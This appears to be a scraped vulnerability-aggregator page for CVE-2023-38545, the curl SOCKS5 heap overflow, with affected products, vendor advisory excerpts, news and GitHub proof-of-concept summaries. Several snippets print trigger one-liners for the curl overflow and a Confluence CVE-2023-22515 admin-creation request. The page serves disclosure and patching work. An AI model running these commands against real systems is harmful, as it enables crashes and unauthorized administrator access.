Published: 18/10/2023 Updated: 01/04/2024

CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9

VMScore: 0

A heap-based buffer overflow has been found in the SOCKS5 proxy handshake component of cURL prior to 8.4.0.

Vulnerable Product	Search on Vulmon	Subscribe to Product
haxx libcurl
fedoraproject fedora 37
netapp oncommand workflow automation -
netapp oncommand insight -
netapp active iq unified manager -
microsoft windows 10 22h2
microsoft windows 11 21h2
microsoft windows 11 22h2
microsoft windows 11 23h2
microsoft windows 10 1809
microsoft windows server 2019
microsoft windows server 2022
microsoft windows 10 21h2

Two security issues were found in Curl, an easy-to-use client-side URL transfer library and command line tool: CVE-2023-38545 Jay Satiro discovered a buffer overflow in the SOCKS5 proxy handshake CVE-2023-38546 It was discovered that under some circumstances libcurl was susceptible to cookie injection For the oldstable distribution ...

An issue was found in curl that can cause a buffer overflow in its SOCKS5 proxy communications code When curl is using a SOCKS5 proxy and it needs to resolve a hostname to an IP address, its default behavior is to pass the hostname to the proxy and allow it to perform the resolution In cases where the hostname is greater than 255 characters in le ...

概述 Important: OpenShift Virtualization 4136 security and bug fix update 类型/严重性 Security Advisory: Important 标题 Red Hat OpenShift Virtualization release 4136 is now available with updates to packages and images that fix several bugs and add enhancementsRed Hat Product Security has rated this update as having a security i ...

Synopsis Important: OpenShift Virtualization 4141 security and bug fix update Type/Severity Security Advisory: Important Topic Red Hat OpenShift Virtualization release 4141 is now available with updates to packages and images that fix several bugs and add enhancementsRed Hat Product Security has rated this update as having a security imp ...

概述 Important: Red Hat JBoss Core Services Apache HTTP Server 2457 SP2 security update 类型/严重性 Security Advisory: Important 标题 Red Hat JBoss Core Services Apache HTTP Server 2457 Service Pack 2 is now availableRed Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability S ...

Synopsis Important: Red Hat Ceph Storage 61 security, enhancements, and bug fix update Type/Severity Security Advisory: Important Topic Updated container image for Red Hat Ceph Storage 61 is now available in the Red Hat Ecosystem Catalog Description Red Hat Ceph Storage is a scalable, open, software-defined storage platform that combines ...

Synopsis Important: curl security update Type/Severity Security Advisory: Important Red Hat Insights patch analysis Identify and remediate systems affected by this advisory View affected systems Topic An update for curl is now available for Red Hat Enterprise Linux 90 Extended Update SupportRed Hat Product Security has rated this ...

Synopsis Important: curl security update Type/Severity Security Advisory: Important Red Hat Insights patch analysis Identify and remediate systems affected by this advisory View affected systems Topic An update for curl is now available for Red Hat Enterprise Linux 92 Extended Update SupportRed Hat Product Security has rated this ...

概述 Important: Red Hat JBoss Core Services Apache HTTP Server 2457 SP2 security update 类型/严重性 Security Advisory: Important Red Hat Insights 补丁分析识别并修复受此公告影响的系统。查看受影响的系统标题 An update is now available for Red Hat JBoss Core ServicesRed Hat Product Security has ...

Synopsis Important: Migration Toolkit for Applications security and bug fix update Type/Severity Security Advisory: Important Topic Migration Toolkit for Applications 621 releaseRed Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scoring System (CVSS) base score, which gives a deta ...

Synopsis Important: Network Observability security update Type/Severity Security Advisory: Important Topic An update for network-observability-console-plugin-container, network-observability-ebpf-agent-container, network-observability-flowlogs-pipeline-container, network-observability-operator-bundle-container, and network-observability-opera ...

Synopsis Important: Red Hat OpenStack Platform 1711 (director-operator) security update Type/Severity Security Advisory: Important Topic An update for osp-director-agent-container, osp-director-downloader-container, osp-director-operator-bundle-container, and osp-director-operator-container is now available for Red Hat OpenStack Platform 17 ...

Synopsis Low: Logging Subsystem 581- Red Hat OpenShift security update Type/Severity Security Advisory: Low Topic An update is now available for RHOL-58-RHEL-9Red Hat Product Security has rated this update as having a security impact of Low A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, i ...

Synopsis Important: OpenShift Virtualization 4135 Images security update Type/Severity Security Advisory: Important Topic Red Hat OpenShift Virtualization release 4135 is now available with updates to packages and images that fix several bugs and add enhancementsRed Hat Product Security has rated this update as having a security impact o ...

Synopsis Important: cert-manager Operator for Red Hat OpenShift 1115 Type/Severity Security Advisory: Important Topic cert-manager Operator for Red Hat OpenShift 1115Red Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed sever ...

Synopsis Important: cert-manager Operator for Red Hat OpenShift 1121 Type/Severity Security Advisory: Important Topic cert-manager Operator for Red Hat OpenShift 1121Red Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed sever ...

Synopsis Important: curl security update Type / Sévérité Security Advisory: Important Analyse des correctifs dans Red Hat Insights Identifiez et remédiez aux systèmes concernés par cette alerte Voir les systèmes concernés Sujet An update for curl is now available for Red Hat Enterprise Linux 9Red Hat Product Security has r ...

Synopsis Important: Kernel Module Management security update Type/Severity Security Advisory: Important Topic This is an update for the Red Hat OpenShift Kernel Module Management 11 operator and images to address CVE-2023-44487 which Red Hat has assessed as being Important (sees accessredhatcom/security/cve/CVE-2023-44487 for detai ...

On October 11, 2023, cURL released Version 840 of the cURL utility and the libcurl library This release addressed two security vulnerabilities: CVE-2023-38545 - High Security Impact Rating (SIR) CVE-2023-38546 - Low SIR This advisory covers CVE-2023-38545 only For more information about this vulnerability, see the cURL advisory This adviso ...

A heap-based buffer overflow has been found in the SOCKS5 proxy handshake component of cURL before 840 ...

LTS-114 has been updated in the LTS channel to 11405735339 (Platform Version: 15437760) for most ChromeOS devices Want to know more about Long Term Support? Click hereThis update contains multiple Security fixes, including:1491296 High  CVE-2023-5472 Use after free in Profiles1458934 Medium CVE-20 ...

A vulnerability (VTS23-013) exists in JP1/VERITAS Affected products and versions are listed below ...

Check Point Reference: CPAI-2023-0916 Date Published: 12 Oct 2023 Severity: Critical ...

About Apple security updates For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available Recent releases are listed on the Apple security releases page Apple security documents reference vulnerabilities by CVE-ID whe ...

Menu Log in ...

Critical Infrastructure Sectors: Critical Manufacturing

A proof of concept for testing CVE-2023-38545 against local curl

CVE-2023-38545: Curl Vulnerability Proof of Concept This repository contains a Proof of Concept (PoC) designed to test systems for the CVE-2023-38545 vulnerability The vulnerability affects the curl utility, specifically versions between 7690 and 831, and is related to the handling of HTTP redirects Prerequisites Required Software: curl Features SOCKS5 Proxy Server runni

One line vulnerabilities

vuln-liners One line vulnerabilities CVE-2023-38545 curl -vvv -x socks5h://localhost:9050 $(python3 -c "print(('A'*10000), end='')") CVE-2023-22515 (Confluence Broken Access Control) curl -k -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=adm1n&fullName=admin&email=admin@confluence&password=adm1n

Dockerfile containing all the necessary setup files to demo the exploit

Quick description This showcases the cURL CVE-2023-38545 It is as lightweight as I could make it Setup First, build the Docker Image: docker build -t cveimage Next, we can simply run the image file, creating a temporary Docker Container which will get deleted once the container is stopped: docker run --rm --tty --net="host" --name cvecontainer cveimage If you are

Simple PoC causing overflow

免责声明本文仅用于技术讨论与学习，利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。 CVE-2023-38545：libcurl-SOCKS5-heap-buffer-overflow 参考项目：githubcom/UTsweetyfish/CVE-2023-38545 做一次复现复现流程：运行如下指令�

CVE-2023-38545 POC for the curl command line tool

CVE-2023-38545 POC for the curl command line tool This POC is based on the earlier POC created by UTsweetyfish, shared in this repository: githubcom/UTsweetyfish/CVE-2023-38545 Contrary to that POC, this one is for the commandline tool and not the libcurl library, and doesn't require Python and no compilation This POC is for the curl SOCKS5 heap buffer overflow,

ipmi-server docker container with Symfony router

IPMI Docker Container for Home Assistant Details of the container IPMI Server This container is a lightweight fully-fledged webserver that allows us to execute ipmitool commands and returns a json object with some results, courtesy of @ateodorescu and their Home Assistant Add-on, ipmi-server and uses their Symphony app and nginx configuration The image itself is based on

Vulnerability-Management-remediation-with-Talon- Create EKS Cluster with Cilium CNI Access Falco sidekick UI Option 1: portforwarding kubectl port-forward svc/falco-falcosidekick-ui -n falco 2802 --insecure-skip-tls-verify Option 2: creating node port apiVersion: v1 kind: Service metadata: name: falco-falcosidekick-ui-nodeport namespac

😄 CVE-2023-38545堆溢出的POC和分析文章

usage git clone githubcom/imfht/CVE-2023-38545 cd CVE-2023-38545/curl-7740 && /configure --with-openssl make -j 4 python3 sockspy & export ALL_PROXY=socks5h://127001:9050 /curl-7740/src/curl $(python3 -c "print(('A'*10000), end='')") -vvvv proof for details please

curl vulnerabilities ironed out with patches after week-long tease

The Register

Topics Security Off-Prem On-Prem Software Offbeat Special Features Vendor Voice Vendor Voice Resources The coordinated disclosure didn’t quite go to plan, though

After a week of rampant speculation about the nature of the security issues in curl, the latest version of the command line transfer tool was finally released today. Described by curl project founder and lead developer Daniel Stenberg as "probably the worst curl security flaw in a long time," the patches address two separate vulnerabilities: CVE-2023-38545 and CVE-2023-38546. We now know the first vulnerability, CVE-2023-38545, is a heap-based buffer overflow flaw that affects both libcurl and t...

CVE-2023-38545

Vulnerability Summary

Vulnerability Trend

Vendor Advisories

ICS Advisories

Github Repositories

Recent Articles

References

Vulmon Search

About

Products

Connect